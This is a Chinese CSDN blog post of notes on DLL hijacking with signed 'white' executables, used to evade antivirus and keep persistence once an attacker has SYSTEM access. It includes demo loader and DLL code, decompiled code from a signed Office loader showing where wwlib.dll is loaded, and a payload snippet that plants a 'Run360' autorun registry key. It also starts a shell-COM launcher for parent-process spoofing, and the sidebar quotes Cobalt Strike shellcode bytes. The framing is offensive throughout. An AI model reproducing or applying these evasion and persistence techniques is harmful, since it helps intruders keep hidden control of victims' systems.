网络安全免杀DLL劫持白文件笔记

于 2024-09-04 23:33:41 发布
阅读量522 收藏 4
点赞数 5
分类专栏: 网络安全 文章标签: web安全 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57836225/article/details/141906763
版权

DLL 劫持白文件利用方式(一)

前言

最近发现针对某些目标,添加启动项,计划任务等比较明显的方式效果并不是很好,所以针对 DLL 劫持从而达到权限的维持的技术进行了一番学习,希望能与读者们一起分享学习过程,然后一起探讨关于 DLL 更多利用姿势。

背景

原理在第一篇已经讲了,下面说说与第一篇的不同之处,这一篇的技术背景是,我们已经获取到 system 权限的情况下,然后需要对目标进行持续性的控制,所以需要对权限进行维护,我们的目标是针对一些主流的软件 or 系统内置会加载的小 DLL 进行转发式劫持(也可以理解为中间人劫持),这种劫持的好处就是即使目标不存在 DLL 劫持漏洞也没关系,我们可以采取直接替换掉原来的 DLL 文件的方式,效果就是,程序依然可以正常加载原来 DLL 文件的功能,但是同时也会执行我们自定义的恶意操作。

劫持的优势

在很久以前,“白 + 黑” 这种免杀方式很火,DLL 劫持的优势其实就是如此。

是不是很懵?先理解下什么是 “白”+“黑”

白加黑木马的结构
1.Exe(白) —-load—-> dll(黑)
2.Exe(白) —-load—-> dll(黑)—-load—-> 恶意代码

白 EXE 主要是指那些带有签名的程序(杀毒软件对于这种软件,特别是 window 签名的程序,无论什么行为都不会阻止的,至于为什么?emmm,原因很多,查杀复杂,定位 DLL 困难,而且最终在内存执行的行为都归于 exe(如果能在众多加载的 DLL 中准确定位到模块,那就是 AI 分析大师。),所以比较好用的基于特征码去查杀,针对如今混淆就像切菜一样简单的时代来说,蛮不够看的,PS. 或许 360 等杀毒有新的方式去检测,emmm,不过我实践发现,基于这个原理过主动防御没啥问题…emmm)

DLL 劫持白文件利用方式(二

劫持方式

为了能够更好地学习,下面方式决定通过写一个 demo 的程序进行测试。

打开 vs2017,新建一个控制台应用程序:

代码如下:

#include <iostream>
#include <Windows.h>
using namespace std;

int main()
{
    // 定义一个函数类DLLFUNC
    typedef void(*DLLFUNC)(void);
    DLLFUNC GetDllfunc1 = NULL;
    DLLFUNC GetDllfunc2 = NULL;
    // 指定动态加载dll库
    HINSTANCE hinst = LoadLibrary(L"TestDll.dll");
    if (hinst!= NULL) {
        // 获取函数位置
        GetDllfunc1 = (DLLFUNC)GetProcAddress(hinst, "msg");
        GetDllfunc2 = (DLLFUNC)GetProcAddress(hinst, "error");
    }
    if (GetDllfunc1!= NULL) {
        //运行msg函数
        (*GetDllfunc1)();
    }
    else {
        MessageBox(0, L"Load msg function Error,Exit!", 0, 0);
        exit(0);
    }
    if (GetDllfunc2!= NULL) {
        //运行error函数
        (*GetDllfunc2)();
    }
    else {
        MessageBox(0, L"Load error function Error,Exit!", 0, 0);
        exit(0);
    }
    printf("Success");
}

程序如果缺乏指定 DLL 的导出函数,那么将会失败。

原生正常 DLL 的代码如下:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>

void msg() {
    MessageBox(0, L"I am msg function!", 0, 0);
}

void error() {
    MessageBox(0, L" I am error function!", 0, 0);
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

framework.h 导出函数如下:

#pragma once

#define WIN32_LEAN_AND_MEAN             // 从 Windows 头文件中排除极少使用的内容
// Windows 头文件
#include <windows.h>

extern "C" __declspec(dllexport) void msg(void);
extern "C" __declspec(dllexport) void error(void);

 extern 表示这是个全局函数,可以供其他函数调用,“C” 表示按照 C 编译器的方式编译
__declspec (dllexport) 这个导出语句可以自动生成 .def((符号表)),这个很关键
如果你没导出,这样调用的程序是没办法调用的(其实也可以尝试从执行过程来分析,可能麻烦点)
建议直接看官方文档:
https://docs.microsoft.com/zh-cn/cpp/build/exporting-from-a-dll?view=msvc-160
正常完整执行的话,最终程序会输出 Success。

通过逆向白文件实现黑方法持久化(三) 

漏洞位置1:
signed int __stdcall sub_30001573(int a1, int a2, int a3, int a4)
{
  HMODULE v4; // edi@1
  FARPROC v5; // ebx@2
  FARPROC v6; // eax@2
  signed int result; // eax@5

  v4 = LoadLibraryW(L"wwlib.dll");
  if ( v4 || (v4 = sub_30001968((int)L"{0638C49D-BB8B-4CD1-B191-051E8F325736}"))!= 0 )
  {
    v5 = GetProcAddress(v4, "FMain");
    dword_30003010 = (int)GetProcAddress(v4, "wdCommandDispatch");
    v6 = GetProcAddress(v4, "wdGetApplicationObject");
    dword_3000300C = (int)v6;
    if ( v5 && dword_30003010 && v6 )
    {
      ((void (__stdcall *)(int, int, int, int))v5)(a1, a2, a3, a4);
      FreeLibrary(v4);
      result = 0;
    }
    else
    {
      result = 1;
    }
  }
  else
  {
    GetLastError();
    result = 1;
  }
  return result;
}
漏洞位置2:
HMODULE __stdcall sub_30001968(int a1)
{
  HMODULE v1; // esi@1
  UINT v2; // eax@1
  unsigned int v4; // eax@3
  int v5; // eax@14
  FARPROC v6; // [sp+8h] [bp-478h]@7
  FARPROC v7; // [sp+Ch] [bp-474h]@7
  int v8; // [sp+10h] [bp-470h]@15
  HMODULE hModule; // [sp+14h] [bp-46Ch]@5
  WCHAR LibFileName; // [sp+18h] [bp-468h]@1
  WCHAR Buffer; // [sp+220h] [bp-260h]@1
  __int16 v12[261]; // [sp+222h] [bp-25Eh]@4
  char v13; // [sp+42Ch] [bp-54h]@14

  v1 = 0;
  LibFileName = 0;
  v2 = GetSystemDirectoryW(&Buffer, 0x105u);
  if (!v2)
    return 0;
  v4 = 2 * v2;
  if (*(WCHAR *)((char *)&Buffer + v4)!= 92)
  {
    *(WCHAR *)((char *)&Buffer + v4) = 92;
    v12[v4 / 2] = 0;
  }
  sub_300018D4(&Buffer, 262, L"msi.dll");
  hModule = LoadLibraryExW(&Buffer, 0, 8u);
  if (!hModule)
  {
    hModule = LoadLibraryW(L"msi.dll");
    if (!hModule)
      return 0;
  }
  v7 = GetProcAddress(hModule, "MsiGetProductCodeW");
  v6 = GetProcAddress(hModule, "MsiProvideQualifiedComponentExW");
  if (!v6)
  {
    FreeLibrary(hModule);
    return 0;
  }
  if (a1)
  {
    if (!v7)
    {
      FreeLibrary(hModule);
      return 0;
    }
    v5 = ((int (__stdcall *)(int, char *))v7)(a1, &v13);
    if (!v5)
    {
      v8 = 260;
      v5 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD, char *, _DWORD, _DWORD, WCHAR *, int *))v6)(
             L"{24AAE126-0911-478F-A019-07B875EB9996}",
             L"wwlib.dll",
             0,
             &v13,
             0,
             0,
             &LibFileName,
             &v8);
      if (!v5)
        goto LABEL_22;
    }
    if (v5 == 1602)
      goto LABEL_22;
  }
  v8 = 260;
  if (!((int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, WCHAR *, int *))v6)(
          L"{24AAE126-0911-478F-A019-07B875EB9996}",
          L"wwlib.dll",
          0,
          0,
          0,
          0,
          &LibFileName,
          &v8))
LABEL_22:
    v1 = LoadLibraryW(&LibFileName);
  FreeLibrary(hModule);
  return v1;
}

        HKEY hKey;
        //打开启动项Key 
        long lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey);
        if (lRet == ERROR_SUCCESS)
        {
            char pFileName[MAX_PATH] = { 0 };
            //得到程序自身的全路径 
            DWORD dwRet = GetModuleFileName(NULL, pFileName, MAX_PATH);
            //添加一个子Key,并设置值 // 下面的"getip"是应用程序名字(不加后缀.exe)
            lRet = RegSetValueEx(hKey, "Run360", 0, REG_SZ, (BYTE *)pFileName, dwRet);

            //关闭注册表 
            RegCloseKey(hKey);
            if (lRet!= ERROR_SUCCESS)
            {
                //AfxMessageBox("系统参数错误,不能随系统启动");
            }
        }
        MessageBoxA(NULL, "test!!!", NULL, 0);

 通过 0DAY 漏洞实现父进程白文件启动(四)

// Run_Explorer.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <windows.h>
#include <shlwapi.h>
#include <shlobj.h>

#pragma comment(lib, "shlwapi.lib")

// use the shell view for the desktop using the shell windows automation to find the
// desktop web browser and then grabs its view
//
// returns:
//      IShellView, IFolderView and related interfaces

HRESULT GetShellViewForDesktop(REFIID riid, void **ppv)
{
    *ppv = NULL;

    IShellWindows *psw;
    HRESULT hr = CoCreateInstance(CLSID_ShellWindows, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&psw));
    if (SUCCEEDED(hr))
    {
        HWND hwnd;
        IDispatch* pdisp;
        VARIANT vEmpty = {}; // VT_EMPTY
        if (S_OK == psw->FindWindowSW(&vEmpty, &vEmpty, SWC_DESKTOP, (long*)&hwnd, SWFO_NEEDDISPATCH, &pdisp))
        {
            IShellBrowser *psb;
            hr = IUnknown_QueryService(pdisp, SID_STopLevelBrowser, IID_PPV_ARGS(&psb));
            if (SUCCEEDED(hr))
            {
                IShellView *psv;
                hr = psb->QueryActiveShellView(&psv);
                if (SUCCEEDED(hr))
                {
                    hr = psv->QueryInterface(riid, ppv);
                    psv->Release();
                }
                psb->Release();
            }
            pdisp->Release();
        }
        else
        {
            hr = E_FAIL;
        }
        psw->Release();
    }
    return hr;
}

// From a shell view object gets its automation interface and from that gets the shell
// application object that implements IShellDispatch2 and related interfaces.

HRESULT GetShellDispatchFromView(IShellView *psv, REFIID riid, void **ppv)
{
    *ppv = NULL;

    IDispatch *pdispBackground;
    HRESULT hr = psv->GetItemObject(SVGIO_BACKGROUND, IID_PPV_ARGS(&pdispBackground));
    if (SUCCEEDED(hr))
    {
        IShellFolderViewDual *psfvd;
        hr = pdispBackground->QueryInterface(IID_PPV_ARGS(&psfvd));
        if (SUCCEEDED(hr))
        {
            IDispatch *pdisp;
            hr = psfvd->get_Application(&pdisp);
            if (SUCCEEDED(hr))
            {
                hr = pdisp->QueryInterface(riid, ppv);
                pdisp->Release();
            }
            psfvd->Release();
        }
        pdispBackground->Release();

阿贾克斯的黎明
关注
专栏目录
Dll劫持
SHELLCODE_8BIT的博客
12-01 694
dll劫持_. iDea.的博客-CSDN博客_dll劫持
[网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
热门推荐
杨秀璋的专栏
02-26 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Cracer教程的第一篇文章,详细讲解了安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。本文将分享Procmon软件基本用法及文件进程、注册表查看,这是一款微软推荐的系统监视工具,功能非常强大可用来检测恶意软件。基础性文章,希望对您有所帮助。
dll劫持
qq_46804551的博客
05-04 6188
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
DLL搜索的目录顺序(DLL劫持
WLINX
08-23 1365
DLL劫持是技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。(...
2022-2024常用经典免杀技术汇总!
03-27
网络安全领域,免杀技术(Evasion)是指恶意软件开发者使用的一种策略,旨在逃避安全软件的检测和防御机制。免杀技术通常涉及多种方法和技术,包括但不限于代码混淆、行为隐藏、利用系统漏洞以及对抗反病毒引擎。...
木马核心技术剖析读书笔记之木马免杀
不急不躁
03-16 2280
免杀原理 基于特征码的检测 基于病毒特征码的检测方法,是目前反病毒软件最常用的检测技术。经过长时间的收集与积累,反病毒软件建立了庞大的已知病毒的特征数据库。在对可疑软件进行检测时,会从特征数据库中匹配已有特征。这种方法相对比较准确、快速,而且可以很容易地通过快速分析,结合新的模板,添加新的病毒文件特征。 特征码可以是一个简单的字符串或者代码字节序列,也可以是包含了已知恶意文件各项特点的...
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1463
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
计算机网络笔记——计算机病毒
最新发布
厂危速归的博客
06-14 568
所谓病毒,是指一段可执行的程序代码,通过对其他程序进行修改可以感染这些程序,使其含有该病毒程序的一个副本。病毒与正常程序唯一的区别是它能将自己附着在另外一个程序上,在宿主程序运行时触发病毒程序代码的执行。一旦病毒执行,它可以完成病毒程序预设的功能,例如删除文件和程序等。​ 在病毒的生存期内,典型的病毒经历了下面4个阶段。在该阶段,病毒处于未运行状态,一般需要通过某个事件来激活,例如一个时间点、一个程序或文件的存在、宿主程序的运行,或者磁盘的容量超出某个限制等。然而,并不是所有的病毒都要经过这个阶段。
DLL劫持生成器.exe
05-21
一键生成DLL文件函数。
DLL劫持示例程序:EXE+DLL
07-03
1. 这是本人编写的DLL劫持演示程序,整个解决方案中包含三个工程:EXE主调程序、DLL被调程序、DLL劫持程序。 2. 本解决方案是基于VS2005开发的。
文件上传
weixin_43152809的博客
12-02 295
什么是文件上传漏洞 在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率。比如企业的OA系统,允许用户上传图片、视频、头像和许多其他相关类型的文件。然而向用户提供的功能越多,web应用收到攻击的可能性就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站的权限,或进一步危害服务器 为什么文件上传存在漏洞 上传文件时,如果服务端代码未对客户端上传的文件进行严格过滤,就容易造成文件上传漏洞 绕过限制 apache解析从右到
DLL劫持
Armandhe的博客
07-21 1555
dll劫持牛逼啊,权限维持好方法,可以劫持一些开机自弃的程序的dll文件,然后只要对方主机上线那么他就成了你的肉鸡
dll 劫持和应用研究
ZL_1618的博客
08-10 582
2020年12月,SolarWinds 攻击事件引发全球的关注(),攻击团队在 2020年上旬通过对 SolarWinds Orion产品实现供应链攻击,导致诸多厂商被攻击,造成了不可估量的损失。这种国家间的 APT 攻击包含了大量的技术细节,其中供应链攻击的实现,也就是 SUNBURST 后门植入这一块引起了我极大的兴趣。
DLL劫持攻击详解:网络安全渗透测试关键技术
DLL劫持(DLL Hijacking)是一种高级网络渗透测试技术,它涉及到对动态链接库(DLL)文件的恶意利用,通常用于绕过应用程序的安全措施,获取系统权限或执行恶意代码。在网络安全环境中,DLL劫持是攻击者常用的手段,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值